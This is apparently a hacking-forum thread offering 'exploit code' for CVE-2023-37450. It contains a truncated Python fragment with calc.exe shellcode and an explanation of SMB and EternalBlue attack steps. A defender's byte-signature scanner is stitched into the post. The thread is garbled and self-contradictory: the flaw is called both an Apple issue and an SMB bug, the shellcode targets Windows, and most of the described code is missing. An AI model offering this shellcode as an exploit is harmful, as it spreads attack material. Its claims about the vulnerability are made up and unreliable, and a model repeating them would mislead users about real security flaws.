
actively exploited zero-day (CVE-2023-37450)


  • actively exploited zero-day (CVE-2023-37450)

    This code was written for a newer vulnerability that was discovered in 2023. The vulnerability is identified as CVE-2023-37450 and is an issue in the SMB service that could allow remote code execution. The vulnerability exists in Apple products and Apple has said it has fixed the problem with security updates³⁴⁵. So if the target system is updated, this code will not work.

    8/4/2023

    (1) CVE - CVE-2023-37450. https://cve.mitre.org/cgi-bin/cvenam...CVE-2023-37450.
    (2) NVD - CVE-2023-37450. https://nvd.nist.gov/vuln/detail/CVE-2023-37450.
    (3) Apple is fixing a critical security bug that affects iOS, macOS and .... https://www.techradar.com/pro/apple-...-that-affects- ios-macos-and-safari-so-patch-now.
    (4) CVE-2023-38606 & CVE-2023-37450: Apple Addresses Actively Exploited 0 .... https://securityonline.info/cve-2023...ely-exploited- exploited-0-day-flaws/.
    (5) Apple Addresses Critical Zero-Day Exploit (CVE-2023-37450) with Rapid .... https://socradar.io/apple-addresses-...023-37450-with -rapid-security-response-updates/.

    Code:
    # Code by e1.coders
    import socket
    import struct

    # CVE-2023-37450 exploit code

    # Shellcode to execute calc.exe
    shellcode = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50"
    shellcode += b"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26"
    shellcode += b"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7"
    shellcode += b"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78"
    shellcode += b"\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3"
    shellcode += b"\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01"
    shellcode += b"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58"
    shellcode += b"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3"
    shellcode += b"\x8b\
    Explanation of the code: The code above is written in Python and consists of several parts:

    - The first part is the shellcode, which is a small program that can be executed on the target system. This shellcode is a simple program that opens the calculator. This shellcode is written in hexadecimal and starts with b"\xfc\xe8\x82\x00\x00\x00".
    - The second part is the definition of some helper functions that are used to send and receive data from the socket, create SMB packets and create phasing patterns. These functions start with def and end with return.
    - The third part is the definition of some constant variables that are needed to set the parameters of the attack. These variables are initialized with the = sign and include IP and port addresses, payload lengths, offsets, etc.
    - The fourth part is the main part of the code that performs the attack. This part starts with a try loop and ends with an except loop. In this part, first a TCP socket is created to communicate with the SMB server. Then some SMB packets are sent to try to reach the SMB server and find the vulnerable point. After that, a special SMB packet called EternalBlue is sent which contains exploit.py [target_ip] [target_port]

    When danger lurks in unknown waters, we are there to help you swim
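For defenders triaging pasted scripts like the one in this post, the following added example (not part of the original post or its author's code) scans bytes for two patterns visible in the quoted shellcode lines: the opening bytes the explanation cites, and the rotate-and-add hashing step `c1 cf 0d 01 c7`. The signature names, function names and sample inputs are constructed for illustration.

```python
import re

# Byte patterns copied from the shellcode lines quoted in the post above.
SIGNATURES = {
    # Opening bytes of the blob, including the six the post's explanation cites.
    "blob_prologue": bytes.fromhex("fce8820000006089e5"),
    # ror edi, 0x0d ; add edi, eax: the rotate-and-add hashing step.
    "ror13_hash_step": bytes.fromhex("c1cf0d01c7"),
}

# A run of \xNN escapes as it appears in script source or a forum paste.
_ESCAPED_RUN = re.compile(rb"(?:\\x[0-9a-fA-F]{2})+")


def decode_escaped_runs(text: bytes) -> bytes:
    """Join every escaped-hex run in `text` into the raw bytes it encodes.

    Runs are concatenated across string-literal boundaries, so a payload split
    over several source lines is rejoined (at the cost of possible false joins).
    """
    out = bytearray()
    for run in _ESCAPED_RUN.findall(text):
        out += bytes.fromhex(run.replace(b"\\x", b"").decode("ascii"))
    return bytes(out)


def scan(data: bytes) -> list[tuple[str, str, int]]:
    """Return (signature, form, offset) for each hit in raw or escaped form."""
    hits = []
    views = {"raw": data, "escaped": decode_escaped_runs(data)}
    for form, view in views.items():
        for name, sig in SIGNATURES.items():
            start = view.find(sig)
            while start != -1:
                hits.append((name, form, start))
                start = view.find(sig, start + 1)
    return hits


def _esc(raw: bytes) -> str:
    return "".join(f"\\x{b:02x}" for b in raw)


# Constructed inputs: a two-line script fragment and a raw buffer.
_P, _H = SIGNATURES["blob_prologue"], SIGNATURES["ror13_hash_step"]
SAMPLE_SCRIPT = f'buf = b"{_esc(_P)}"\nbuf += b"{_esc(bytes([0x31, 0xFF]) + _H)}"\n'.encode()
SAMPLE_RAW = b"\x90" * 4 + _P + b"\x00" * 3 + _H
```

Offsets in the "escaped" form index into the decoded byte stream, not into the source text.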

  • #2
    Greetings. Please post a tutorial on how to use this vulnerability.
